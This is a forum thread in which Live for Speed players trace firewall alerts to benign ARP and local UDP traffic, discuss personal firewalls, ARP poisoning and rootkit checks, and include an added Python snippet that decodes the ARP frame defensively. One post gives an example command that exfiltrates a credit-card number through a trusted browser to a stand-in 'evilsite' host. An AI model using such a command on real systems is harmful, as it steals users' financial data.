The online racing simulator
LFS sending mysterious data packets
Hello,

I've noticed several times when installing a new patch that my software firewall kicks in randomly because the LFS executable has changed and it queries me whether to allow the application access to the network or not. However, the time and place of LFS's attempt to send data is a little mysterious.
I was just driving some offline laps when I received the following information from my firewall:

The executable has changed since the last time you used: D:\Spiele\LFS\LFS.exe
File Version :
File Description : D:\Spiele\LFS\LFS.exe
File Path : D:\Spiele\LFS\LFS.exe
Process ID : 0xC2C (Heximal) 3116 (Decimal)
Connection origin : local initiated
Protocol : Raw Ethernet
Local Address : 0.0.0.0
Local Port : 0
Remote Name :
Remote Address : 0.0.0.0
Remote Port : 0
Ethernet packet details:
Ethernet II (Packet Length: 56)
Destination: ff-ff-ff-ff-ff-ff
Source: 00-50-70-92-14-2b
Type: ARP (0x0806)
Address Resolution Protocol (ARP)
Hardware type: Ethernet (0x0001)
Protocol type: IP (0x0800)
Hardware size: 6
Protocol size: 4
Opcode: Request
Sender hardware address: 00-50-70-92-14-2b
Sender IP address: 192.168.4.100
Target hardware address: 00-00-00-00-00-00
Target IP address: 192.168.4.254
Binary dump of the packet:
0000: FF FF FF FF FF FF 00 50 : 70 92 14 2B 08 06 00 01 | .......Pp..+....
0010: 08 00 06 04 00 01 00 50 : 70 92 14 2B C0 A8 04 64 | .......Pp..+...d
0020: 00 00 00 00 00 00 C0 A8 : 04 FE C8 19 FC 74 50 18 | .............tP.
0030: 42 4C 1F 7A 00 00 2A 05 : | BL.z..*.

What exactly is LFS trying to achieve? The target IP address is the local address of my router... so is that some kind of network broadcast? Why does it happen randomly during offline play? :/

Maybe Scawen could shed some light on this?

biggie
Hi biggie.

LFS should not make any attempts to send packets, unless you ask it to, as described here :

http://www.lfsforum.net/showthread.php?p=117972#post117972

My software firewall has never told me that LFS is trying to send packets unexpectedly. The only packets it should usually send in offline mode are either InSim, OutSim or OutGauge packets, which could only be started by a command line /insim=xxxxx or some lines in the cfg.txt (make sure OutGauge Mode and OutSim Mode are set to 0).

Other than that, I have not a clue - maybe some overactive antivirus software, or a virus?
All of my LFS also send such packets. When I make a rule to block these connections, it waits quite a lot (expecting network connection).

Direction: outgoing
Local Point: 0.0.0.0, port 31000
Adapter: N/A
Remote Point: 127.0.0.1, port 28888
Protocol: UDP

checking config...
Well, I've found a line in cfg.txt:

OutSim Mode 0

I have an antivirus, but to be sure I compared the MD5 of the running LFS.exe with a freshly unpacked one:

>md5digest LFS.exe
md5digest.exe, Version 1.0
Copyright 2004 Hermetic Systems, http://www.hermetic.ch/
File: LFS.exe
Filesize: 1560576 bytes
MD5 digest: 9A 53 F4 66 F7 64 12 D1 05 BC E7 8C 2B 53 14 80

>md5digest LFSu.exe
md5digest.exe, Version 1.0
Copyright 2004 Hermetic Systems, http://www.hermetic.ch/
File: LFSu.exe
Filesize: 1560576 bytes
MD5 digest: 9A 53 F4 66 F7 64 12 D1 05 BC E7 8C 2B 53 14 80

@Scawen: thanks for your reply. I've read through your posting in the other thread and I really appreciate your approach on this matter. This is all part of what makes LFS so great.

However, I couldn't imagine how a virus would affect LFS. Actually my firewall has an application hijacking detection, so if for example a virus would attempt to "remote-control" another application to mask itself, the firewall would detect it. I don't know how secure this feature is, but I highly doubt it might be a virus.
Does the binary dump of the packet tell you anything?

I'm gonna do another virus scan and check for processes not showing up in the task manager. You never know :/

Quote from detail :Well, I've found a line in cfg.txt:
OutSim Mode 0

OutSim and OutGauge are both 0 for me too.
Biggie, do you have the d3d8.dll in your LFS dir? I've renamed it and the packets disappeared. Checked this twice. d3d8.dll (GhostCar mod) was the cause for me.

Found it because I noticed that GhostCar has the same port 28888 to which the mysterious packets were sent.
Of course he does - he uses the ghostcar
Quote from detail :Biggie, do you have the d3d8.dll in your LFS dir? I've renamed it and the packets disappeared. Checked this twice. d3d8.dll (GhostCar mod) was the cause for me.

Found it because I noticed that GhostCar has the same port 28888 to which the mysterious packets were sent.

Nope, I don't use the GhostMod :/ there's not a single dll in my LFS folder.
Quote from tristancliffe :Of course he does - he uses the ghostcar

I don't use it either, but I've tried it once and left the dll there, Mr. Sense of Humour.
How to check these packets? (Any manual for noobs like me?!)
#11 - avih
Quote from detail :All of my LFS also send such packets. When I make a rule to block these connections, it waits quite a lot (expecting network connection).

Direction: outgoing
Local Point: 0.0.0.0, port 31000
Adapter: N/A
Remote Point: 127.0.0.1, port 28888
Protocol: UDP

checking config...

127.0.0.1 is your local computer. No need to worry, it doesn't send the data out of your computer. Probably some kind of inter-application communication like InSim or the other stuff that Scawen mentioned.
I know that. For me it just makes some inconvenience with firewall windows.
Quote from biggie :
Connection origin : local initiated
Protocol : Raw Ethernet
Local Address : 0.0.0.0
Destination: ff-ff-ff-ff-ff-ff
Source: 00-50-70-92-14-2b
Type: ARP (0x0806)
Address Resolution Protocol (ARP)
Hardware type: Ethernet (0x0001)
Protocol type: IP (0x0800)
Opcode: Request
Sender hardware address: 00-50-70-92-14-2b
Sender IP address: 192.168.4.100
Target hardware address: 00-00-00-00-00-00
Target IP address: 192.168.4.254

What exactly is LFS trying to achieve?

OK, now for some (Ether) networking 101.

Skip to 'In plain English' if you don't want to be confused by networking details.

On an Ethernet network, devices need the hardware address (MAC address) of each other to be able to communicate. If you are running a TCP/IP protocol over an Ethernet network, your computer needs to know which IP address (e.g. 192.168.1.1) corresponds to which MAC/hardware address (e.g. 00-50-56-C0-00-01).

To get this information your computer will broadcast an 'ARP request' containing the IP address of a device of which it would like to know the MAC/hardware address. Usually this 'ARP request' is not sent by the application itself; it is part of the address resolution (see ARP) handled by the OS. The response to the above request will be sent by the device listening to the target IP address.

In your case the application wanted to know the MAC/hardware address of the device listening to the IP address 192.168.4.254. This is absolutely harmless and standard procedure.

In plain English

Your computer shouted 'Who is listening to 192.168.4.254 and where does he live?'. This is absolutely normal and happens all the time when your computer is trying to talk to a computer in your local network via TCP/IP. Those ARP packets are never sent to the internet because nobody in the outer world would care.

What I wonder is, what crappy software 'firewall' gives you that kind of useless information?

On a personal side note: I so hate 'personal firewalls'! If you are on DSL/cable get a cheap router and live in peace.
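To make the explanation above concrete, here is the frame from the first post decoded and run through a few defender's sanity checks. This is an added example, not code from the thread or from LFS; the 192.168.4.0/24 subnet is an assumption taken from the two addresses in the dump.

```python
import struct
from ipaddress import ip_address, ip_network

# The 56-byte frame transcribed from the firewall's binary dump in the first post.
DUMP = bytes.fromhex(
    "FFFFFFFFFFFF00507092142B08060001"
    "08000604000100507092142BC0A80464"
    "000000000000C0A804FEC819FC745018"
    "424C1F7A00002A05"
)

ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = "ff-ff-ff-ff-ff-ff"


def fmt_mac(raw: bytes) -> str:
    return "-".join(f"{b:02x}" for b in raw)


def parse_ethernet_arp(frame: bytes) -> dict:
    """Decode Ethernet II (14 bytes) + ARP (28 bytes); anything after is padding."""
    if len(frame) < 42:
        raise ValueError("frame too short for Ethernet + ARP")
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETHERTYPE_ARP:
        raise ValueError(f"not ARP: ethertype 0x{ethertype:04x}")
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = struct.unpack(
        "!HHBBH6s4s6s4s", frame[14:42]
    )
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("not ARP for IPv4 over Ethernet")
    return {
        "dst_mac": fmt_mac(dst), "src_mac": fmt_mac(src), "opcode": op,
        "sender_mac": fmt_mac(sha), "sender_ip": str(ip_address(spa)),
        "target_mac": fmt_mac(tha), "target_ip": str(ip_address(tpa)),
        "trailing_bytes": len(frame) - 42,
    }


def assess(arp: dict, local_net: str) -> dict:
    """Checks for one ARP frame; all True means a plain 'who has X?' lookup."""
    net = ip_network(local_net)  # assumed subnet, e.g. "192.168.4.0/24"
    return {
        # A normal request is broadcast, opcode 1, with the target MAC still unknown.
        "plain_request": (arp["dst_mac"] == BROADCAST and arp["opcode"] == ARP_REQUEST
                          and arp["target_mac"] == "00-00-00-00-00-00"),
        # The ARP sender MAC should match the frame's source MAC.
        "sender_matches_frame": arp["src_mac"] == arp["sender_mac"],
        # Both addresses should sit on the local subnet (the router here).
        "both_on_local_net": (ip_address(arp["sender_ip"]) in net
                              and ip_address(arp["target_ip"]) in net),
        # An ARP reply nobody asked for is what cache poisoning looks like; a request is not.
        "not_unsolicited_reply": arp["opcode"] != ARP_REPLY,
    }


if __name__ == "__main__":
    info = parse_ethernet_arp(DUMP)
    print(info)
    print(assess(info, "192.168.4.0/24"))
```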
Quote from aDRENOcHROME :On a personal side note: I so hate 'personal firewalls'! If you are on DSL/cable get a cheap router and live in peace.

But... a router can only stop things listening as servers (because you have to specifically tell the router to forward the specified port to the specified local ip address). It doesn't stop anything you run on your computer, from accessing the internet. I'm pleased that my software firewall stops so many programs accessing the internet! So many programs you install, immediately try to send some info somewhere, and I really do not want these programs "phoning home" without my consent. Who knows what info they are going to send?

And it has also stopped some very mysterious things from accessing the internet, somehow a program that was initialised simply by browsing the web. The router would not have made any attempt to stop these unauthorised internet accesses.
Quote from Scawen :somehow a program that was intialised simply by browing the web.

do you use internet explorer?
Quote from Scawen :But... a router can only stop things listening as servers (because you have to specifically tell the router to forward the specified port to the specified local ip address). It doesn't stop anything you run on your computer, from accessing the internet. I'm pleased that my software firewall stops so many programs accessing the internet! So many programs you install, immediately try to send some info somewhere, and I really do not want these programs "phoning home" without my consent. Who knows what info they are going to send?

I'm fully aware of this and I ran software firewalls for years, so I know what you are talking about. But I think in most cases either the risk is low or the firewall will not protect me sufficiently. Let me get into this ...

IMHO there are two types of applications I would like to keep from accessing network resources:
1) bad mannered standard applications (eg. phone home software)
2) malicious software (eg. trojans, viruses, ...)

In case of (1) 'phoney software', it boils down to trust and keeping sensitive data safe. On top of this I have heaps of really boring data on my HD and I doubt any software will find something interesting to phone home about. Again this is not about evil software, just chatty phone home applications. So the risk is low (on my computer).

Another thing I noticed is that in times of the 'intarweb' a lot of applications are net-bound by nature, so you either cannot block net access without making it useless or you open up your firewall. There's just no way to tell legitimate from nasty traffic. Catch-22.

Case (2) 'the evildoers' is something completely different. In my opinion you cannot block malicious traffic because you usually have at least one trusted application in your 'firewall'. Let's say you have IE in your trusted list of apps. What prevents evil app (tm) from calling 'IEXPLORE.EXE http://evilsite,com/eat.php?mycreditcard=123456'? Or even worse, injecting code into the trusted app (DLL inject) and piggybacking sensitive data, reusing trusted network connections. As far as I know software firewalls still do the fingerprinting 'on disk' and not 'in memory' so it will go unnoticed. Considering recent virus descriptions it also seems to be possible to simply kill the firewall process and happily send data unnoticed.

To sum it all up ... I (and it might only work for me) rely on trusted software and keeping sensitive data safe. The small gain in protection for me is not worth the trouble I had with recent sw firewalls.

Edit: One thing I forgot. Considering the constant nagging of sw firewalls that this or that application wants net access, end users tend to allow a lot more apps access than needed. They just want to get rid of the message box. Another problem is that a user has to grant permission based on the path and name of the application. Let's say I'm an evil programmer and I wrote a software called 'IEXPLORE.EXE' located in 'c:\programms\'. Which user would think 'ahh this is strange, usually IE lives in ...'? I bet 90% would grant the application access thinking 'stupid firewall, I told you a zillion times that IE is trusted'. OK, I'll stop ranting ... in the end I would always trust LFS.exe
#17 - wien
Well, from your own post:
Quote from biggie :The executable has changed since the last time you used: D:\Spiele\LFS\LFS.exe

Sounds very much like a virus to me. Can't see any other reason for LFS.exe changing. Unless it's simply the firewall reacting to a patch or something...
#18 - avih
Quote from Scawen :But... a router can only stop things listening as servers (because you have to specifically tell the router to forward the specified port to the specified local ip address). It doesn't stop anything you run on your computer, from accessing the internet. I'm pleased that my software firewall stops so many programs accessing the internet! So many programs you install, immediately try to send some info somewhere, and I really do not want these programs "phoning home" without my consent. Who knows what info they are going to send?

And it has also stopped some very mysterious things from accessing the internet, somehow a program that was initialised simply by browsing the web. The router would not have made any attempt to stop these unauthorised internet accesses.

Amen to that
Been using SPF, and it's quite interesting what apps try to access the internet. Possibly the most interesting one is IE when searching local (!) files... of course, it gets blocked and continues to work as usual as if nothing happened
Quote from wien :Well, from your own post:Sounds very much like a virus to me. Can't see any other reason for LFS.exe changing. Unless it's simply the firewall reacting to a patch or something...

Quote from biggie from initial posting :I've noticed several times when installing a new patch that my software firewall kicks in...

@aDRENOcHROME: (love it when you have to copy&paste people's usernames to address them :P) Thanks for your insights into networking. Anyway, for some reason I completely overlooked the line that said "ARP"... of course this isn't at all dangerous. I was aware that the target IP was my router so actually no harm could have been done.

Furthermore I agree with Scawen. I'm actually happy to have a personal firewall to allow me to control my outbound network traffic at least a little bit. To me, the firewall already does a fine job by not allowing most of the "standard applications" to access directly. I like to be in control, or at least have the illusion of being in control
About trojans and viruses... well, I don't really know their advanced techniques. But as I said, my software firewall has an application hijacking detection. So when another program tries to use Internet Explorer to do something very very mean, it will alert me about this.
It also features a "DLL authentication" which keeps applications from running DLLs in the context of other trusted applications.
Again, I cannot say how secure this is in the end but it's the best free personal firewall available. I'm glad to have it. And I haven't had any viruses or trojans in years...
It's always good to keep an open eye, not install software blindly, keep peering at the task manager from time to time (and from time to time use tools that also show hidden processes...) and of course keep your system up-to-date patch-wise. It has worked for me in the last few years. No problems whatsoever.

Quote from GC :How to check these packets ? (any manual for noobs like me ?! )

http://www.blitzbox-download.com/spf.exe

There's a full packet logging mechanism and you can define a maximum file size for the log. As you can imagine, this log would grow big quite fast.
It might be more useful to disable (or only temporarily activate) this, because the firewall will automatically show you the latest packet from access attempts of unknown applications anyway. I'm sure that packet logging might drain some resources on your system if enabled permanently.
Quote from biggie :
@aDRENOcHROME: (love it when you have to copy&paste people's usernames to address them :P) Thanks for your insights into networking. Anyway, for some reason I completely overlooked the line that said "ARP"... of course this isn't at all dangerous. I was aware that the target IP was my router so actually no harm could have been done.

I guess you never heard about "arp poisoning" (ARP IS dangerous). LFS has no reason at all to send ARP packets even for normal online activity, so to me (from the info you gave) it sounds like a virus trying to reprogram routes in your LAN to be "the man in the middle" ...but this is also unlikely to me. Are you sure you cannot give more info?
What firewall do you have? Do you listen to audio CDs on the PC (remember the Sony rootkit)?
Quote from Honey :I guess you never heard about "arp poisoning" (ARP IS dangerous). LFS has no reason at all to send ARP packets even for normal online activity, so to me (from the info you gave) it sounds like a virus trying to reprogram routes in your LAN to be "the man in the middle" ...but this is also unlikely to me. Are you sure you cannot give more info?
What firewall do you have? Do you listen to audio CDs on the PC (remember the Sony rootkit)?

Actually, I'm a networking n00b but your advice is much appreciated. I've heard of ARP before and while I know what it does, I wasn't really aware that it might be abused in this fashion.
I'm using the Sygate Personal Firewall 5.6 and I haven't listened to Sony Audio CDs on my PC. I know about their dirty business with the rootkit which is why I won't buy any of that crap.

I've just noticed that this ARP requesting also happens with other applications, so I think we can rule out that this is an LFS problem. Whether it's a glitch in the firewall or really some mean old trojan horse, I'm not sure. At least there are no strange processes running or suspicious connections open on my PC. And as I said I'm usually very careful with what I install... I'll post my findings if there's anything interesting I discover.
Maybe you can try RootkitRevealer from sysinternals.com; it's free and may help to find out if a rootkit is installed (I forgot that StarForce too is a malevolent rootkit). Unfortunately interpreting its report is not an easy task, but on the site there should be some info or some FAQs.

I never tried Sygate, I suggest doing some Google searches with "sygate arp" or similar (it is obvious but many times I forget it also), so you may find out if it's a firewall false alarm or bug.

Hope it helps.

EDIT:
On that site you find other useful tools like "process explorer" and "autoruns" (and many others) that may help you get a detailed insight into current processes and dependencies and what is actually instantiated at every Windows boot.
Sygate is the best software firewall there is.
Sometimes you might be surprised that there is no single entry in the process list or autorun, but the virus, trojan or whatsoever is in your system.

I was cleaning several computers in the last 2 months and the antivirus didn't find those bad trojans. There was no entry in autorun or the process list.

Just by a guess from what the user told me and when the weird things started to happen, I had to search file by file and found something. It was a confusing job as the files were also simply undeletable.

Just some users browse on doubtful webpages. Today it is very hard for a normal user, when searching for something, to guess which page you can trust and which not :-(.
Quote from DEVIL 007 :Sometimes you might be surprised that there is no single entry in the process list or autorun, but the virus, trojan or whatsoever is in your system.

Just to be clear, "process explorer" and "autoruns" from Sysinternals show the very hidden things and not the classical keys in the registry or the task manager list... you can never understand how deep those apps go until you try.